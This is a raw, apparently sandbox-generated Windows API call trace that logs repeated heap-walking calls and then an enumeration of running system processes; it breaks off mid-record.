[0095.450] Heap32First (lphe=0x9e2efc0, th32ProcessID=0x6f8, th32HeapID=0x630000) returned 1 [0095.494] GetCurrentThreadId () returned 0x42c [0095.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.494] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.534] GetTickCount () returned 0x11f0220 [0095.534] GetCurrentThreadId () returned 0x42c [0095.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.534] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.577] GetTickCount () returned 0x11f024f [0095.577] GetCurrentThreadId () returned 0x42c [0095.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.577] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.615] GetTickCount () returned 0x11f026e [0095.615] GetCurrentThreadId () returned 0x42c [0095.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.615] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.644] GetTickCount () returned 0x11f028e [0095.644] GetCurrentThreadId () returned 0x42c [0095.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.645] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.687] GetTickCount () returned 0x11f02bc [0095.687] GetCurrentThreadId () returned 0x42c [0095.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.687] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.715] GetTickCount () returned 0x11f02dc [0095.715] GetCurrentThreadId () returned 0x42c [0095.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.716] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.744] GetTickCount () returned 0x11f02eb [0095.744] GetCurrentThreadId () returned 0x42c [0095.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.744] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.772] GetTickCount () returned 0x11f030a [0095.772] GetCurrentThreadId () returned 0x42c [0095.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.772] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.801] GetTickCount () returned 0x11f032a [0095.801] GetCurrentThreadId () returned 0x42c [0095.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.801] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.825] GetTickCount () returned 0x11f0349 [0095.825] GetCurrentThreadId () returned 0x42c [0095.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.825] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.853] GetTickCount () returned 0x11f0358 [0095.853] GetCurrentThreadId () returned 0x42c [0095.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.853] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.884] GetTickCount () returned 0x11f0378 [0095.884] GetCurrentThreadId () returned 0x42c [0095.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.885] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.914] GetTickCount () returned 0x11f0397 [0095.914] GetCurrentThreadId () returned 0x42c [0095.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.915] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.947] GetTickCount () returned 0x11f03b6 [0095.947] GetCurrentThreadId () returned 0x42c [0095.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.947] Heap32Next (lphe=0x9e2efc0) returned 1 [0095.989] GetTickCount () returned 0x11f03e5 [0095.989] GetCurrentThreadId () returned 0x42c [0095.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.989] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.018] GetTickCount () returned 0x11f0404 [0096.018] GetCurrentThreadId () returned 0x42c [0096.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.019] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.062] GetTickCount () returned 0x11f0433 [0096.062] GetCurrentThreadId () returned 0x42c [0096.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.062] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.087] GetTickCount () returned 0x11f0442 [0096.087] GetCurrentThreadId () returned 0x42c [0096.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.087] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.111] GetTickCount () returned 0x11f0462 [0096.111] GetCurrentThreadId () returned 0x42c [0096.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.111] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.140] GetTickCount () returned 0x11f0481 [0096.140] GetCurrentThreadId () returned 0x42c [0096.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.140] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.185] GetTickCount () returned 0x11f04b0 [0096.186] GetCurrentThreadId () returned 0x42c [0096.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.186] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.213] GetTickCount () returned 0x11f04cf [0096.213] GetCurrentThreadId () returned 0x42c [0096.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.213] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.247] GetTickCount () returned 0x11f04ee [0096.247] GetCurrentThreadId () returned 0x42c [0096.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.248] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.277] GetTickCount () returned 0x11f050d [0096.277] GetCurrentThreadId () returned 0x42c [0096.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.277] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.305] GetTickCount () returned 0x11f051d [0096.306] GetCurrentThreadId () returned 0x42c [0096.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.306] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.333] GetTickCount () returned 0x11f053c [0096.333] GetCurrentThreadId () returned 0x42c [0096.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.333] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.357] GetTickCount () returned 0x11f055b [0096.357] GetCurrentThreadId () returned 0x42c [0096.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.357] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.357] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.383] GetTickCount () returned 0x11f056b [0096.383] GetCurrentThreadId () returned 0x42c [0096.383] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.383] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.416] GetTickCount () returned 0x11f059a [0096.416] GetCurrentThreadId () returned 0x42c [0096.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.417] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.460] GetTickCount () returned 0x11f05b9 [0096.460] GetCurrentThreadId () returned 0x42c [0096.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.460] Heap32Next (lphe=0x9e2efc0) returned 1 [0096.498] GetTickCount () returned 0x11f05e8 [0096.499] Heap32ListNext (hSnapshot=0x6b4, lphl=0x9e2f454) returned 1 [0096.499] GetTickCount () returned 0x11f05e8 [0096.499] GetTickCount () returned 0x11f05e8 [0096.499] Process32First (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.500] GetCurrentThreadId () returned 0x42c [0096.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.500] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.502] GetTickCount () returned 0x11f05e8 [0096.502] GetCurrentThreadId () returned 0x42c [0096.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.502] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.503] GetTickCount () returned 0x11f05e8 [0096.503] GetCurrentThreadId () returned 0x42c [0096.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.503] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.504] GetTickCount () returned 0x11f05e8 [0096.504] GetCurrentThreadId () returned 0x42c [0096.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.505] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.506] GetTickCount () returned 0x11f05e8 [0096.506] GetCurrentThreadId () returned 0x42c [0096.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.506] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.507] GetTickCount () returned 0x11f05e8 [0096.507] GetCurrentThreadId () returned 0x42c [0096.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.507] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.509] GetTickCount () returned 0x11f05e8 [0096.509] GetCurrentThreadId () returned 0x42c [0096.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.510] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.511] GetTickCount () returned 0x11f05f7 [0096.511] GetCurrentThreadId () returned 0x42c [0096.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.511] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.512] GetTickCount () returned 0x11f05f7 [0096.512] GetCurrentThreadId () returned 0x42c [0096.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.512] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.514] GetTickCount () returned 0x11f05f7 [0096.514] GetCurrentThreadId () returned 0x42c [0096.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.514] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.515] GetTickCount () returned 0x11f05f7 [0096.515] GetCurrentThreadId () returned 0x42c [0096.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.515] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.516] GetTickCount () returned 0x11f05f7 [0096.516] GetCurrentThreadId () returned 0x42c [0096.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.516] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.518] GetTickCount () returned 0x11f05f7 [0096.518] GetCurrentThreadId () returned 0x42c [0096.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.518] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.519] GetTickCount () returned 0x11f05f7 [0096.519] GetCurrentThreadId () returned 0x42c [0096.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.519] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2b, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.520] GetTickCount () returned 0x11f05f7 [0096.520] GetCurrentThreadId () returned 0x42c [0096.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.520] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.524] GetTickCount () returned 0x11f05f7 [0096.524] GetCurrentThreadId () returned 0x42c [0096.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.524] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.525] GetTickCount () returned 0x11f0607 [0096.525] GetCurrentThreadId () returned 0x42c [0096.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.525] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.526] GetTickCount () returned 0x11f0607 [0096.526] GetCurrentThreadId () returned 0x42c [0096.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.526] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.527] GetTickCount () returned 0x11f0607 [0096.528] GetCurrentThreadId () returned 0x42c [0096.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.528] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x42c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.529] GetTickCount () returned 0x11f0607 [0096.529] GetCurrentThreadId () returned 0x42c [0096.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.529] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.530] GetTickCount () returned 0x11f0607 [0096.530] GetCurrentThreadId () returned 0x42c [0096.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.530] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.531] GetTickCount () returned 0x11f0607 [0096.531] GetCurrentThreadId () returned 0x42c [0096.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.531] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.532] GetTickCount () returned 0x11f0607 [0096.532] GetCurrentThreadId () returned 0x42c [0096.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.532] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0096.533] GetTickCount () returned 0x11f0607 [0096.533] GetCurrentThreadId () returned 0x42c [0096.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.533] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.535] GetTickCount () returned 0x11f0607 [0096.535] GetCurrentThreadId () returned 0x42c [0096.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.535] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.536] GetTickCount () returned 0x11f0607 [0096.536] GetCurrentThreadId () returned 0x42c [0096.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.536] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, 